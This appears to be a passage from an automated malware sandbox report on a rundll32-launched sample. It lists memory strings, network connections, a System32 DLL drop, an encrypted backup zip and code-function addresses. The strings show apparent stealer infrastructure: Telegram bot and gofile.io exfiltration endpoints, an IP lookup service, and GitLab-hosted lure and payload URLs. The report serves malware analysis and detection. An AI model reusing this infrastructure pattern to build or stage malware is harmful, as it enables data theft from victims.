binary or memory: https://aka.ms/binaryformatter
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com
        Source: rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
        Source: rundll32.exe, 0000000E.00000002.2575981932.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityP%b
        Source: rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
        Source: rundll32.exe, 00000003.00000002.3110264354.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539726700.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.gofile.io/serversP%b
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.gofile.io/serversY
        Source: rundll32.exe, 00000003.00000002.3110264354.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539726700.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.ipify.orgP%b
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.ipify.orgY
        Source: rundll32.exe, 00000003.00000002.3110264354.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539726700.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.telegram.org/botP%b
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.telegram.org/boti
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/dotnet/efcore
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/dotnet/linker/issues/2715.
        Source: rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/dotnet/runtime
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/50820
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/ericsink/SQLitePCL.raw
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/icsharpcode/SharpZipLib
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/issues/1187
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/issues/1416.
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/issues/1731
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/issues/1895vUsing
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/issues/1906.
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/issues/1981
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/issues/2025
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mono/linker/pull/2125.
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://gitlab.com/app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false
        Source: rundll32.exe, 00000003.00000002.3110264354.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539726700.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://gitlab.com/app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=falseP%b
        Source: rundll32.exe, 00000003.00000002.3110264354.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539726700.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://gitlab.com/hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?in
        Source: rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://system.data.sqlite.org/
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://system.data.sqlite.org/X
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://urn.to/r/sds_see12https://urn.to/r/sds_see2
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://urn.to/r/sds_see23https://urn.to/r/sds_see1UInnerVerify
        Source: msedge.exe, 00000005.00000002.1732478813.0000353C00110000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1738248439.0000538C00110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.newtonsoft.com/json
        Source: rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
        Source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.sqlite.org/rescode.html
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
        Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
        Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
        Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
        Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
        Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.4:49933 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49956 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:50069 version: TLS 1.2

        System Summary

        barindex
        Source: Backup_[United States]_8.46.123.189_[1401].zip.14.drZip Entry: encrypted
        Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\system32\e_sqlite3.dllJump to behavior
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF244FE014_2_00007FFDFF244FE0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF20DF4014_2_00007FFDFF20DF40
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF20257014_2_00007FFDFF202570
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1EF5D014_2_00007FFDFF1EF5D0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF15451014_2_00007FFDFF154510
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1F3F8814_2_00007FFDFF1F3F88
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF238F8014_2_00007FFDFF238F80
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1B2FD014_2_00007FFDFF1B2FD0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF16001014_2_00007FFDFF160010
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF22205014_2_00007FFDFF222050
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF17AE9014_2_00007FFDFF17AE90
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF19AEA014_2_00007FFDFF19AEA0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1A5EE014_2_00007FFDFF1A5EE0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF188EF014_2_00007FFDFF188EF0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1CFEF014_2_00007FFDFF1CFEF0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1CCF2014_2_00007FFDFF1CCF20
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1ECD8214_2_00007FFDFF1ECD82
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1C3D7014_2_00007FFDFF1C3D70
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1ECDCA14_2_00007FFDFF1ECDCA
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF279DC014_2_00007FFDFF279DC0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1AFDB014_2_00007FFDFF1AFDB0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF17BE1014_2_00007FFDFF17BE10
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF286E3014_2_00007FFDFF286E30
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1A8E2014_2_00007FFDFF1A8E20
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF204C9014_2_00007FFDFF204C90
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF22ACD014_2_00007FFDFF22ACD0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF17DCD014_2_00007FFDFF17DCD0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF220CB014_2_00007FFDFF220CB0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1F7CB014_2_00007FFDFF1F7CB0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1ECD0F14_2_00007FFDFF1ECD0F
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1B4CE014_2_00007FFDFF1B4CE0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF188B6014_2_00007FFDFF188B60
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF18FBD014_2_00007FFDFF18FBD0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF15FBB014_2_00007FFDFF15FBB0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF152BE014_2_00007FFDFF152BE0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF158BF014_2_00007FFDFF158BF0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF227C2014_2_00007FFDFF227C20
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF182A9014_2_00007FFDFF182A90
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1E0A6014_2_00007FFDFF1E0A60
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1E9AB014_2_00007FFDFF1E9AB0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF15AAE614_2_00007FFDFF15AAE6
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF184B2014_2_00007FFDFF184B20
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1D898014_2_00007FFDFF1D8980
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1A69D014_2_00007FFDFF1A69D0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF22FA1014_2_00007FFDFF22FA10
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF177A0014_2_00007FFDFF177A00
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1C7A3014_2_00007FFDFF1C7A30
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF207A3014_2_00007FFDFF207A30
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF18A8A014_2_00007FFDFF18A8A0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF2058B014_2_00007FFDFF2058B0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF18691214_2_00007FFDFF186912
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1FD94014_2_00007FFDFF1FD940
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF15B93014_2_00007FFDFF15B930
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF21477014_2_00007FFDFF214770
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1BB76014_2_00007FFDFF1BB760
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1DE77014_2_00007FFDFF1DE770
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF23B7D014_2_00007FFDFF23B7D0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1AA7A014_2_00007FFDFF1AA7A0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF22581014_2_00007FFDFF225810
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF20D81014_2_00007FFDFF20D810
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF19E81014_2_00007FFDFF19E810
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF2457F014_2_00007FFDFF2457F0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF17A7F014_2_00007FFDFF17A7F0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF17D7F014_2_00007FFDFF17D7F0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1C97F014_2_00007FFDFF1C97F0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF28883014_2_00007FFDFF288830
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF19D83014_2_00007FFDFF19D830
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF21669014_2_00007FFDFF216690
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF19766014_2_00007FFDFF197660
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1DB66014_2_00007FFDFF1DB660
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1C46C014_2_00007FFDFF1C46C0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF20B6B014_2_00007FFDFF20B6B0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF2686B014_2_00007FFDFF2686B0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1B96B014_2_00007FFDFF1B96B0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1DD6E014_2_00007FFDFF1DD6E0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1D36E014_2_00007FFDFF1D36E0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF15A74614_2_00007FFDFF15A746
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1B857014_2_00007FFDFF1B8570
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF19457014_2_00007FFDFF194570
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF17F5A014_2_00007FFDFF17F5A0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1C25A014_2_00007FFDFF1C25A0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF15A61014_2_00007FFDFF15A610
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1F361214_2_00007FFDFF1F3612
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF2365F014_2_00007FFDFF2365F0
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1BC65014_2_00007FFDFF1BC650
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF17562414_2_00007FFDFF175624
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF21363014_2_00007FFDFF213630
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF28949014_2_00007FFDFF289490
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF20947014_2_00007FFDFF209470
